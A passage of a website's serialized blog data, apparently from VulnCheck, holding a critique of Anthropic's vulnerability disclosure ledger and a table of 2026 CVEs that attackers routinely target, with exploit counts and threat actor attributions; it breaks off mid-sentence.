[{"data":1,"prerenderedAt":118775},["ShallowReactive",2],{"blogs":3},[4,245,1283,2945,3251,3361,3475,4405,10386,10836,10960,11213,11638,12121,12340,13178,14368,14773,19473,19758,19996,20175,21165,21755,22033,22712,23277,23690,25038,25508,25667,28147,29789,29997,30391,31233,31575,32054,32193,32474,33019,33175,33326,33535,33743,33975,34220,35966,36181,36738,37237,37570,39557,40497,40693,40896,41059,41218,41496,41808,42084,42358,42590,43052,43729,43977,44349,44574,44957,45089,45335,45507,53878,54492,54953,55258,57674,57897,58064,58359,58582,58909,59184,59397,59875,60094,60262,60409,60512,60712,60920,61409,62304,62477,63094,63308,63480,64275,64460,64562,64701,65167,65340,65664,66095,66199,66389,66600,67476,68013,68139,68278,68837,69247,69351,71602,72033,72131,72328,72522,73057,73315,73371,73643,73693,73738,73845,73977,74099,76694,78348,79424,81094,81334,82175,83377,83583,83926,84033,84755,85789,86076,87186,87311,89206,89932,91859,92128,93269,95222,96704,98686,99867,100729,103277,103572,103780,106084,107053,107762,109221,111309,111564,112220,112564,115668,118385,118751],{"id":5,"title":6,"articles":7,"authors":8,"body":14,"date":232,"description":233,"extension":234,"image":7,"link":7,"meta":235,"navigation":237,"path":238,"seo":239,"series":7,"stem":240,"subtype":7,"tags":241,"__hash__":244},"blog\u002Fblog\u002Fanthropic-ledger.md","Observations on Anthropic’s Vulnerability Disclosure Ledger",null,[9],{"name":10,"avatar":11,"link":12,"linkName":13},"Patrick Garrity","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U06EPQ5RXFU-475c2549c30d-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fpatrickmgarrity\u002F","in\u002Fpatrickmgarrity\u002F",{"type":15,"value":16,"toc":218},"minimark",[17,21,43,60,65,73,77,83,87,95,98,102,108,117,124,128,131,142,146,149,153,159,162,165,169,184,189,193,196,199,203,206,209],[18,19,20],"p",{},"Key Takeaways",[22,23,24,28,31,34,37,40],"ul",{},[25,26,27],"li",{},"Anthropic cited “thousands of high-severity vulnerabilities,” but 
the ledger does not include CVE-2026-4747 and still shows only 27 fixed findings, despite the dashboard announcement referencing 88 published advisories.",[25,29,30],{},"The next month will help show whether the ledger is being maintained as an active disclosure process. Ten undisclosed findings are already past Anthropic’s stated 90-day disclosure window, and 168 more will reach that mark soon.",[25,32,33],{},"Anthropic’s disclosure policy sends mixed messages. The policy references a 90-day publication window, a 45-day wait after patches, 14-day extensions and broader exceptions, which makes the practical disclosure clock less straightforward.",[25,35,36],{},"The ledger is missing most CVE\u002FGHSA mappings and the CVSS metrics used to calculate severity.",[25,38,39],{},"Only 1,596 of the 23,019 vulnerability candidates have reached maintainers so far, underscoring the human effort involved in validation, disclosure coordination and remediation that still has to happen.",[25,41,42],{},"Anthropic is not the only organization facing this challenge. Its ledger is an early public example of the pressure AI-assisted vulnerability discovery could place on maintainers, PSIRTs and open source security teams.",[18,44,45,46,53,54,59],{},"Since the initial announcement of Anthropic Glasswing, I've been ",[47,48,52],"a",{"href":49,"rel":50},"https:\u002F\u002Fgithub.com\u002Fpatrickmgarrity\u002FAnthropic-Credited-CVEs",[51],"nofollow","tracking vulnerabilities publicly disclosed that have been attributed to Anthropic",". 
In that announcement, Anthropic claimed \"Mythos Preview has already found thousands of high-severity vulnerabilities.\" I found it odd that only a single CVE discovered by Mythos was mentioned publicly in their research, so I was excited to see their first step toward transparency with the launch of the ",[47,55,58],{"href":56,"rel":57},"https:\u002F\u002Fred.anthropic.com\u002F2026\u002Fcvd\u002F",[51],"Anthropic Disclosure Ledger",".",[61,62,64],"h2",{"id":63},"exploring-anthropics-ledger","Exploring Anthropic’s Ledger",[18,66,67,72],{},[68,69],"img",{"alt":70,"src":71},"Software Supplier Trends","\u002Fblog\u002Fanthropic-ledger\u002Fledger-findings.png","\nIn my initial exploration of the Anthropic Ledger, I found it odd that the only CVE disclosed in Anthropic's initial Glasswing report, CVE-2026-4747, isn't listed on the disclosure ledger. And while the Glasswing vulnerability disclosure dashboard announcement claims 88 security advisories have been published, the dashboard has sat at just 27 fixed vulnerabilities and no additional findings since its launch nearly three weeks ago.",[61,74,76],{"id":75},"forecasting-disclosures","Forecasting Disclosures",[18,78,79,82],{},[68,80],{"alt":76,"src":81},"\u002Fblog\u002Fanthropic-ledger\u002Fledger-disclosures.png","\nWhile 27 findings have been patched and released, the 10 findings that have already passed Anthropic's 90-day disclosure policy deadline have yet to be revealed. In the next 30 days, 168 more findings will reach that 90-day deadline. 
Considering there have been no real updates to the ledger since launch, it will be interesting to see if Anthropic actually follows through on its disclosure policy.",[61,84,86],{"id":85},"contradicting-vulnerability-disclosure-policy","Contradicting Vulnerability Disclosure Policy",[18,88,89,94],{},[47,90,93],{"href":91,"rel":92},"https:\u002F\u002Fwww.anthropic.com\u002Fcoordinated-vulnerability-disclosure",[51],"Anthropic's coordinated vulnerability disclosure policy"," appears to contain contradictory statements. In one place it says \"we aim to share details publicly with defenders after 90 days, or after a patch is released, whichever comes first.\" In another it says, \"Once a patch is available, we would generally wait 45 days before publishing full technical details.\"",[18,96,97],{},"The policy also includes a host of caveats that carve out exceptions: a 14-day extension can be granted if a vendor or maintainer is engaged and making progress toward a fix as the 90-day deadline approaches, and in extenuating circumstances Anthropic reserves the right to adjust deadlines entirely.\nI'm not trying to be overly critical, but the lack of updates to the ledger in the first three weeks is worth calling out.",[61,99,101],{"id":100},"patches-pre-dating-reporting-timeline","Patches Pre-Dating Reporting Timeline",[18,103,104],{},[68,105],{"alt":106,"src":107},"Anthropic Timelines","\u002Fblog\u002Fanthropic-ledger\u002Ftimeline.png",[18,109,110,111,116],{},"Another observation worth noting is that there are several instances across the ledger where a patch appears to have been released before the vulnerability was even reported to the maintainer. 
This could mean the maintainer was already aware of and had fixed the vulnerability independently, but it may also highlight research collisions similar to what we saw with an OpenSSL vulnerability, where ",[47,112,115],{"href":113,"rel":114},"https:\u002F\u002Faisle.com\u002Fblog\u002Faisle-discovers-20-openssl-zero-days-in-6-months",[51],"AISLE discovered and provided a fix"," well before Anthropic reported it.",[18,118,119,120],{},"Example: ",[47,121,122],{"href":122,"rel":123},"https:\u002F\u002Fred.anthropic.com\u002F2026\u002Fcvd\u002Ffindings\u002FANT-2026-DJBBBBPE",[51],[61,125,127],{"id":126},"incomplete-cve-attribution","Incomplete CVE attribution",[18,129,130],{},"Only 14 of the vulnerabilities in the Anthropic ledger have a CVE associated with them in the ledger itself; however, all of them do have a CVE. For example, the Ghost vulnerability disclosed by Anthropic as finding ANT-2026-H5T8XKWR has CVE-2026-26980 listed on its GitHub security advisory.",[18,132,119,133,137,141],{},[47,134,135],{"href":135,"rel":136},"https:\u002F\u002Fred.anthropic.com\u002F2026\u002Fcvd\u002Ffindings\u002FANT-2026-H5T8XKWR",[51],[47,138,139],{"href":139,"rel":140},"https:\u002F\u002Fgithub.com\u002FTryGhost\u002FGhost\u002Fsecurity\u002Fadvisories\u002FGHSA-w52v-v783-gw97",[51],"\nCVE-2026-26980",[61,143,145],{"id":144},"why-are-cvss-vectors-omitted-from-the-ledger","Why are CVSS vectors omitted from the ledger?",[18,147,148],{},"Anthropic's ledger update acknowledges that Claude overestimated the severity of vulnerabilities it discovered compared to third-party manual assessments, but it doesn't mention CVSS as the basis for determining severity. It's also odd that the ledger includes severity ratings from Claude, from a security research firm, and from the maintainer, yet provides no base metrics to explain how those ratings were calculated. This omission makes it impossible to assess what factors might be driving Claude's inflated scores. 
CVSS is also not mentioned anywhere in the report, which leaves open the possibility that different methodologies or standards were used across assessments. Anthropic should be publishing the metrics used to determine severity.",[61,150,152],{"id":151},"what-about-the-20000-other-candidates","What about the 20,000+ other candidates?",[18,154,155],{},[68,156],{"alt":157,"src":158},"Anthropic","\u002Fblog\u002Fanthropic-ledger\u002Fanthropic-triage.png",[18,160,161],{},"Anthropic validated and reported 467 findings out of 23,000, with an additional 1,129 findings reported without validation at the maintainer's request. If it took roughly 60 days to send 1,596 findings, just 6.9% of the total, to maintainers, it puts the resource limitations around validating, reporting, and fixing AI-discovered vulnerabilities at this scale into sharp relief. At that pace it would take approximately 2.4 years to work through the backlog.\nDuring that time it's reasonable to expect other AI-assisted researchers will independently discover and report many of the same vulnerabilities. The more unsettling question is how many of those findings will be discovered and actively exploited by adversaries before Anthropic ever gets to them.",[18,163,164],{},"It's worth noting that not all 23,019 candidates would necessarily be reported, as many may not survive triage or validation. Even so, if the 21,000+ remaining candidates convert at a rate similar to what we've seen so far, the backlog challenge doesn't get meaningfully smaller.",[61,166,168],{"id":167},"resource-limitations-related-to-coordinated-vulnerability-disclosure","Resource Limitations Related to Coordinated Vulnerability Disclosure",[18,170,171,172,177,178,183],{},"The challenges Anthropic is facing with coordinated disclosure closely mirror what VulnCheck is hearing from PSIRTs and the open source community, both of which are being overwhelmed with vulnerability reports. 
It also aligns with the recent ",[47,173,176],{"href":174,"rel":175},"https:\u002F\u002Fwww.whitehouse.gov\u002Fpresidential-actions\u002F2026\u002F06\u002Fpromoting-advanced-artificial-intelligence-innovation-and-security\u002F",[51],"Executive Order on Promoting Advanced Artificial Intelligence Innovation and Security",", as well as the senior leader perspective published in The Cyber Defense Review, \"",[47,179,182],{"href":180,"rel":181},"https:\u002F\u002Fcyberdefensereview.army.mil\u002FPortals\u002F6\u002FDocuments\u002F2026-vol11-iss2\u002FCDR_V11_N2_Hathaway.pdf",[51],"Responsible Disclosure in the Age of AI: A Call for Urgent Action.","\"",[18,185,186],{},[68,187],{"alt":157,"src":188},"\u002Fblog\u002Fanthropic-ledger\u002Fexecutive-order.png",[61,190,192],{"id":191},"the-industry-challenges-ahead","The Industry Challenges Ahead",[18,194,195],{},"The ledger is a meaningful first step, and transparency is hard, especially at this scale. But first steps only matter if they're followed through on. The security community is watching, and the next 30 days will be the real test as 168 findings hit the 90-day deadline. Whether Anthropic follows through on its disclosure policy will say a lot about whether the ledger is a genuine commitment or just a footnote.",[18,197,198],{},"These challenges aren't unique to Anthropic, though. They're a preview of what the entire security ecosystem is about to face as AI-assisted vulnerability discovery scales across the industry. The question of how to validate, disclose, and remediate findings at machine speed with human processes is one the community hasn't solved yet. Anthropic is just the first organization doing it publicly enough to examine. 
How it handles what comes next matters well beyond its own ledger.",[61,200,202],{"id":201},"about-vulncheck","About VulnCheck",[18,204,205],{},"VulnCheck is helping organizations do more than solve the vulnerability prioritization challenge: we’re working to equip product managers, CSIRT\u002FPSIRT, SecOps and threat hunting teams to work faster and more accurately using VulnCheck solutions.",[18,207,208],{},"We knew that our industry needed better data, faster, across the board. So that’s what we deliver to the market. We’re going to continue to deliver key insights on vulnerability management, exploitation and major trends we can extrapolate from our dataset to continuously support practitioners.",[18,210,211,212,217],{},"Are you interested in learning more? If so, VulnCheck's ",[47,213,216],{"href":214,"rel":215},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fexploit-intelligence",[51],"Exploit & Vulnerability Intelligence"," has broad threat actor coverage. 
Register and demo our data today.",{"title":219,"searchDepth":220,"depth":220,"links":221},"",2,[222,223,224,225,226,227,228,229,230,231],{"id":63,"depth":220,"text":64},{"id":75,"depth":220,"text":76},{"id":85,"depth":220,"text":86},{"id":100,"depth":220,"text":101},{"id":126,"depth":220,"text":127},{"id":144,"depth":220,"text":145},{"id":151,"depth":220,"text":152},{"id":167,"depth":220,"text":168},{"id":191,"depth":220,"text":192},{"id":201,"depth":220,"text":202},"2026-06-09","Public CVE disclosure volumes are surging across major software suppliers and open source projects, and the evidence increasingly points to AI-assisted vulnerability discovery as the driving force.","md",{"slug":236},"anthropic-ledger",true,"\u002Fblog\u002Fanthropic-ledger",{"title":6,"description":233},"blog\u002Fanthropic-ledger",[242,243],"cve","ai","Csz4hpGoBaUlmpjvEu7pwd8JWWPDAeFcxVqkwNfK9oA",{"id":246,"title":247,"articles":248,"authors":254,"body":260,"date":1271,"description":1272,"extension":234,"image":7,"link":7,"meta":1273,"navigation":237,"path":1275,"seo":1276,"series":7,"stem":1277,"subtype":7,"tags":1278,"__hash__":1282},"blog\u002Fblog\u002Froutinely-targeted-vulnerabilities-may-2026.md","Quantifying 2026 Routinely Targeted Vulnerabilities (So Far)",[249],{"title":250,"source":251,"link":252,"date":253},"MSSP Market News: Vulnerability Management Moves From CVE Lists to Fixes","MSSP Alert","https:\u002F\u002Fwww.msspalert.com\u002Fnews\u002Fmssp-market-news-58-of-cisos-would-pay-the-ransom-thats-an-mssp-problem","2026-05-22",[255],{"name":256,"avatar":257,"link":258,"linkName":259},"Caitlin Condon","\u002Fteam\u002Fcaitlin-condon.jpg","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fccondon\u002F","in\u002Fccondon\u002F",{"type":15,"value":261,"toc":1261},[262,267,276,291,299,306,880,890,893,897,923,949,952,992,996,1011,1025,1029,1032,1045,1087,1090,1094,1127,1176,1180,1187,1200,1202,1205,1226],[263,264],"check-list",{":list":265,"ico":266,"title":20},"[\"VulnCheck 
identified 25 CVEs disclosed in 2026 that have been routinely targeted by adversaries and researchers so far this year, drawing from a global body of exploit code and exploitation data.\",\"Enterprise network edge technologies continue to be hard-hit by state-sponsored and sophisticated adversaries, while security researchers have prioritized vulnerabilities in AI platforms and open-source code bases.\",\"VulnCheck has observed a 59% increase in new KEVs when compared with the same period in 2025.\"]","mdi:check-bold",[18,268,269,270,275],{},"In February, VulnCheck introduced our 2025 Routinely Targeted Vulnerabilities list, a compilation of CVEs ",[47,271,274],{"href":272,"rel":273},"https:\u002F\u002Fwww.vulncheck.com\u002F2025-routinely-targeted-vulnerabilities",[51],"researched and exploited"," by a range of threat actors in 2025. Today, we’re releasing a list of 2026 vulnerabilities that our analysts have determined qualify for “Routinely Targeted” status based on a combination of threat actor, ransomware, and botnet targeting, along with public exploit density and breadth of in-the-wild exploitation evidence.",[18,277,278,279,284,285,290],{},"VulnCheck data captures risk and threat indicators across the entire vulnerability lifecycle, drawing on 500+ data sources to track exploit code maturity and validity, evidence of use in the wild, and threat actor attribution and tooling. 
VulnCheck’s ",[47,280,283],{"href":281,"rel":282},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fcanary-intelligence",[51],"Canary Intelligence"," network also detects CVE-based and pre-CVE attacks against real vulnerable software deployments, which gives us ",[47,286,289],{"href":287,"rel":288},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Freturn-of-the-kinsing",[51],"insight"," into attacker behavior patterns and payload variants.",[18,292,293,294,298],{},"The following vulnerabilities have been disclosed ",[295,296,297],"strong",{},"and"," exploited in the wild in 2026, with one exception: SmarterTools SmarterMail CVE-2025-52691 was disclosed in late December 2025. Threat actor counts also include unattributed activity: All unattributed activity collectively is counted as one (1) threat actor instance in our calculations. General country-level attribution (e.g., Russia, China) is also collectively tracked as one (1) threat actor instance for any given CVE (per country).",[18,300,301,302,59],{},"This list is almost certain to change as the year goes on. Some vulnerabilities that don’t already have copious threat actor or ransomware citations will undoubtedly drop off our Routinely Targeted list by the end of the year, while others will gather new attributions and rise. 
For comparison, the full list of 2025 Routinely Targeted Vulnerabilities can be found ",[47,303,305],{"href":272,"rel":304},[51],"here",[307,308,309,335],"table",{},[310,311,312],"thead",{},[313,314,315,320,323,326,329,332],"tr",{},[316,317,319],"th",{"align":318},"center","CVE",[316,321,322],{"align":318},"Vuln",[316,324,325],{"align":318},"Exploits",[316,327,328],{"align":318},"Threat Actors",[316,330,331],{"align":318},"Ransomware",[316,333,334],{"align":318},"Notes",[336,337,338,363,387,409,431,453,475,497,518,539,560,581,602,623,644,666,687,709,731,753,775,795,815,836,858],"tbody",{},[313,339,340,348,351,354,357,360],{},[341,342,343],"td",{"align":318},[47,344,347],{"href":345,"rel":346},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-21509",[51],"CVE-2026-21509",[341,349,350],{"align":318},"Microsoft Office security feature bypass",[341,352,353],{"align":318},"2",[341,355,356],{"align":318},"6",[341,358,359],{"align":318},"No",[341,361,362],{"align":318},"Fancy Bear (RU), Razor Tiger (IN), North Korea attribution",[313,364,365,372,375,378,381,384],{},[341,366,367],{"align":318},[47,368,371],{"href":369,"rel":370},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-52691",[51],"CVE-2025-52691",[341,373,374],{"align":318},"SmarterTools SmarterMail unrestricted file upload",[341,376,377],{"align":318},"12",[341,379,380],{"align":318},"4",[341,382,383],{"align":318},"Yes",[341,385,386],{"align":318},"Storm-1175 (China), Static Kitten (Iran); ongoing exploitation observed by VulnCheck Canaries",[313,388,389,396,399,402,404,406],{},[341,390,391],{"align":318},[47,392,395],{"href":393,"rel":394},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-1281",[51],"CVE-2026-1281",[341,397,398],{"align":318},"Ivanti Endpoint Manager Mobile (EPMM) command injection",[341,400,401],{"align":318},"5",[341,403,380],{"align":318},[341,405,359],{"align":318},[341,407,408],{"align":318},"Static Kitten (Iran), China 
attribution",[313,410,411,418,421,424,426,428],{},[341,412,413],{"align":318},[47,414,417],{"href":415,"rel":416},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-1731",[51],"CVE-2026-1731",[341,419,420],{"align":318},"BeyondTrust RS and PRA command injection",[341,422,423],{"align":318},"7",[341,425,380],{"align":318},[341,427,383],{"align":318},[341,429,430],{"align":318},"Storm-1175 (China), Static Kitten (Iran)",[313,432,433,440,443,446,448,450],{},[341,434,435],{"align":318},[47,436,439],{"href":437,"rel":438},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-22769",[51],"CVE-2026-22769",[341,441,442],{"align":318},"Dell RecoverPoint for VMs hard-coded credentials",[341,444,445],{"align":318},"0",[341,447,380],{"align":318},[341,449,359],{"align":318},[341,451,452],{"align":318},"UNC6201 (China), SectorB (China), UAT-8616",[313,454,455,462,465,468,470,472],{},[341,456,457],{"align":318},[47,458,461],{"href":459,"rel":460},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-15556",[51],"CVE-2025-15556",[341,463,464],{"align":318},"Notepad++ supply chain incident",[341,466,467],{"align":318},"1",[341,469,380],{"align":318},[341,471,359],{"align":318},[341,473,474],{"align":318},"Supply chain incident; Lotus Blossom (China) attribution",[313,476,477,484,487,489,492,494],{},[341,478,479],{"align":318},[47,480,483],{"href":481,"rel":482},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20700",[51],"CVE-2026-20700",[341,485,486],{"align":318},"Apple (multiple products) buffer overflow",[341,488,445],{"align":318},[341,490,491],{"align":318},"3",[341,493,359],{"align":318},[341,495,496],{"align":318},"UNC6353 (suspected RU), UNC6748",[313,498,499,506,509,511,513,515],{},[341,500,501],{"align":318},[47,502,505],{"href":503,"rel":504},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-1340",[51],"CVE-2026-1340",[341,507,508],{"align":318},"Ivanti Endpoint Manager Mobile (EPMM) code 
injection",[341,510,401],{"align":318},[341,512,491],{"align":318},[341,514,359],{"align":318},[341,516,517],{"align":318},"Iran, China attribution",[313,519,520,527,530,532,534,536],{},[341,521,522],{"align":318},[47,523,526],{"href":524,"rel":525},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20127",[51],"CVE-2026-20127",[341,528,529],{"align":318},"Cisco Catalyst SD-WAN Manager authentication bypass",[341,531,356],{"align":318},[341,533,491],{"align":318},[341,535,359],{"align":318},[341,537,538],{"align":318},"UAT-8616, Iran attribution",[313,540,541,548,551,553,555,557],{},[341,542,543],{"align":318},[47,544,547],{"href":545,"rel":546},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-21513",[51],"CVE-2026-21513",[341,549,550],{"align":318},"Microsoft Windows MSHTML security feature bypass",[341,552,353],{"align":318},[341,554,491],{"align":318},[341,556,359],{"align":318},[341,558,559],{"align":318},"Fancy Bear (RU), SectorC (suspected RU)",[313,561,562,569,572,574,576,578],{},[341,563,564],{"align":318},[47,565,568],{"href":566,"rel":567},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-23760",[51],"CVE-2026-23760",[341,570,571],{"align":318},"SmarterTools SmarterMail authentication bypass",[341,573,401],{"align":318},[341,575,491],{"align":318},[341,577,383],{"align":318},[341,579,580],{"align":318},"Warlock ransomware, Storm-1175 (China), Storm-2603 (China)",[313,582,583,590,593,595,597,599],{},[341,584,585],{"align":318},[47,586,589],{"href":587,"rel":588},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20131",[51],"CVE-2026-20131",[341,591,592],{"align":318},"Cisco Secure Firewall Management Center (FMC) deserialization",[341,594,467],{"align":318},[341,596,353],{"align":318},[341,598,383],{"align":318},[341,600,601],{"align":318},"Iran attribution, Interlock 
ransomware",[313,603,604,611,614,616,618,620],{},[341,605,606],{"align":318},[47,607,610],{"href":608,"rel":609},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-33634",[51],"CVE-2026-33634",[341,612,613],{"align":318},"Aquasecurity Trivy embedded malicious code",[341,615,491],{"align":318},[341,617,353],{"align":318},[341,619,359],{"align":318},[341,621,622],{"align":318},"Supply chain incident; TeamPCP attribution",[313,624,625,632,635,637,639,641],{},[341,626,627],{"align":318},[47,628,631],{"href":629,"rel":630},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-21858",[51],"CVE-2026-21858",[341,633,634],{"align":318},"n8n \"Ni8mare\" unauthenticated information disclosure",[341,636,377],{"align":318},[341,638,467],{"align":318},[341,640,359],{"align":318},[341,642,643],{"align":318},"Zerobot; not on CISA KEV",[313,645,646,653,656,659,661,663],{},[341,647,648],{"align":318},[47,649,652],{"href":650,"rel":651},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-24061",[51],"CVE-2026-24061",[341,654,655],{"align":318},"GNU Inetutils telnetd authentication bypass",[341,657,658],{"align":318},"49",[341,660,467],{"align":318},[341,662,383],{"align":318},[341,664,665],{"align":318},"Qilin ransomware, many public exploits",[313,667,668,675,678,680,682,684],{},[341,669,670],{"align":318},[47,671,674],{"href":672,"rel":673},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-24423",[51],"CVE-2026-24423",[341,676,677],{"align":318},"SmarterTools SmarterMail RCE",[341,679,401],{"align":318},[341,681,467],{"align":318},[341,683,383],{"align":318},[341,685,686],{"align":318},"Qilin ransomware",[313,688,689,696,699,702,704,706],{},[341,690,691],{"align":318},[47,692,695],{"href":693,"rel":694},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-31431",[51],"CVE-2026-31431",[341,697,698],{"align":318},"Linux Kernel \"Copy Fail\" privilege 
escalation",[341,700,701],{"align":318},"132",[341,703,467],{"align":318},[341,705,359],{"align":318},[341,707,708],{"align":318},"Most researched CVE of 2026 so far",[313,710,711,718,721,724,726,728],{},[341,712,713],{"align":318},[47,714,717],{"href":715,"rel":716},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-39987",[51],"CVE-2026-39987",[341,719,720],{"align":318},"marimo pre-auth RCE via terminal WebSocket",[341,722,723],{"align":318},"9",[341,725,467],{"align":318},[341,727,359],{"align":318},[341,729,730],{"align":318},"Broad exploitation and botnet weaponization observed by Sysdig",[313,732,733,740,743,746,748,750],{},[341,734,735],{"align":318},[47,736,739],{"href":737,"rel":738},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-41940",[51],"CVE-2026-41940",[341,741,742],{"align":318},"cPanel & WHM authentication bypass",[341,744,745],{"align":318},"26",[341,747,467],{"align":318},[341,749,383],{"align":318},[341,751,752],{"align":318},"Sorry ransomware, Mirai botnet exploitation",[313,754,755,762,765,767,770,772],{},[341,756,757],{"align":318},[47,758,761],{"href":759,"rel":760},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20128",[51],"CVE-2026-20128",[341,763,764],{"align":318},"Cisco Catalyst SD-WAN Manager DCA User Takeover",[341,766,467],{"align":318},[341,768,769],{"align":318},"1*",[341,771,359],{"align":318},[341,773,774],{"align":318},"Cisco Talos has observed at least 10 different threat clusters exploiting this vulnerability as part of the \"XenShell\" exploit",[313,776,777,784,787,789,791,793],{},[341,778,779],{"align":318},[47,780,783],{"href":781,"rel":782},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20133",[51],"CVE-2026-20133",[341,785,786],{"align":318},"Cisco Catalyst SD-WAN Manager Information Disclosure 
Vulnerability",[341,788,467],{"align":318},[341,790,769],{"align":318},[341,792,359],{"align":318},[341,794,774],{"align":318},[313,796,797,804,807,809,811,813],{},[341,798,799],{"align":318},[47,800,803],{"href":801,"rel":802},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-20122",[51],"CVE-2026-20122",[341,805,806],{"align":318},"Cisco Catalyst SD-WAN Manager UploadAck File Overwrite",[341,808,467],{"align":318},[341,810,769],{"align":318},[341,812,359],{"align":318},[341,814,774],{"align":318},[313,816,817,824,827,829,831,833],{},[341,818,819],{"align":318},[47,820,823],{"href":821,"rel":822},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-29014",[51],"CVE-2026-29014",[341,825,826],{"align":318},"MetInfo CMS unauthenticated PHP code injection",[341,828,467],{"align":318},[341,830,769],{"align":318},[341,832,359],{"align":318},[341,834,835],{"align":318},"VulnCheck Canaries detecting consistent exploitation; not on CISA KEV",[313,837,838,845,848,851,853,855],{},[341,839,840],{"align":318},[47,841,844],{"href":842,"rel":843},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-23744",[51],"CVE-2026-23744",[341,846,847],{"align":318},"MCPJam inspector missing authentication",[341,849,850],{"align":318},"19",[341,852,467],{"align":318},[341,854,359],{"align":318},[341,856,857],{"align":318},"Highly researched (public exploits); not on CISA KEV",[313,859,860,867,870,873,875,877],{},[341,861,862],{"align":318},[47,863,866],{"href":864,"rel":865},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2026-33017",[51],"CVE-2026-33017",[341,868,869],{"align":318},"Langflow unauthenticated code injection",[341,871,872],{"align":318},"13",[341,874,467],{"align":318},[341,876,359],{"align":318},[341,878,879],{"align":318},"Internet-facing hosts have ballooned since disclosure, suggesting honeypot deployment",[22,881,882],{},[25,883,884,885,889],{},"See ",[886,887,888],"code",{},"A Note on Cisco SD-WAN CVEs"," below for threat 
actor calculations on these vulnerabilities.",[18,891,892],{},"Much like VulnCheck's 2025 Routinely Targeted list, the vulnerabilities above aren't meant to be taken as a one-dimensional hierarchy of CVEs expressed as a top-to-bottom list. VulnCheck analyzes several different types of exploit data, each of which can change a vulnerability’s ranking meaningfully when prioritized or filtered out.",[61,894,896],{"id":895},"_2026-top-threat-actor-and-ransomware-cves","2026 Top Threat Actor and Ransomware CVEs",[18,898,899,900,905,906,911,912,917,918,922],{},"It’s still early in the year, but a handful of front-runners have already emerged. CVE-2026-21509, a security feature bypass in Microsoft Office that was weaponized in zero-day document-based attacks in January 2026, was exploited by Fancy Bear (APT28) in a well-publicized ",[47,901,904],{"href":902,"rel":903},"https:\u002F\u002Fblog.polyswarm.io\u002Ffancy-bear-leveraging-cve-2026-21509-in-operation-neusploit",[51],"series"," of ",[47,907,910],{"href":908,"rel":909},"https:\u002F\u002Fwww.trellix.com\u002Fblogs\u002Fresearch\u002Fapt28-stealthy-campaign-leveraging-cve-2026-21509-cloud-c2\u002F",[51],"incidents"," targeting Central and Eastern Europe (including ",[47,913,916],{"href":914,"rel":915},"https:\u002F\u002Fcert.gov.ua\u002Farticle\u002F6287250",[51],"Ukraine","). A trio of vulnerabilities in SmarterTools SmarterMail (CVE-2025-52691, CVE-2026-23760, and CVE-2026-24423) disclosed between late December 2025 and late January 2026 have seen exploitation by Iranian and (multiple) Chinese-backed threat actors, as well as the Qilin and Warlock ransomware families; VulnCheck’s ",[47,919,283],{"href":920,"rel":921},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Fcanary-intelligence",[51]," network has continued to detect ongoing exploitation of all three flaws, with new detections still coming in at time of writing. 
And CVE-2026-41940, a zero-day authentication bypass in cPanel and WHM disclosed publicly in late April 2026, has accumulated exploitation by the Sorry ransomware family and the Mirai botnet, in addition to racking up more than two dozen public exploits.",[18,924,925,926,931,932,936,937,942,943,948],{},"To absolutely nobody’s surprise, enterprise network edge gear has also been hit hard so far this year, with Ivanti Endpoint Manager Mobile (EPMM), BeyondTrust Remote Support (RS), Cisco Secure Firewall Management Center (FMC), and Cisco SD-WAN all seeing notable threat activity. Ivanti CVE-2026-1281 (command injection) and CVE-2026-1340 (code injection) were used in Chinese and ",[47,927,930],{"href":928,"rel":929},"https:\u002F\u002Fctrlaltintel.com\u002Fresearch\u002FMuddyWater\u002F",[51],"Iran","-linked reconnaissance and exploitation campaigns; BeyondTrust CVE-2026-1731 (command injection) was exploited by Iranian-backed ",[47,933,935],{"href":928,"rel":934},[51],"MuddyWater"," and Chinese threat actor ",[47,938,941],{"href":939,"rel":940},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F04\u002F06\u002Fstorm-1175-focuses-gaze-on-vulnerable-web-facing-assets-in-high-tempo-medusa-ransomware-operations\u002F",[51],"Storm-1175","; Cisco Secure Firewall Management Center CVE-2026-20131 was exploited by the 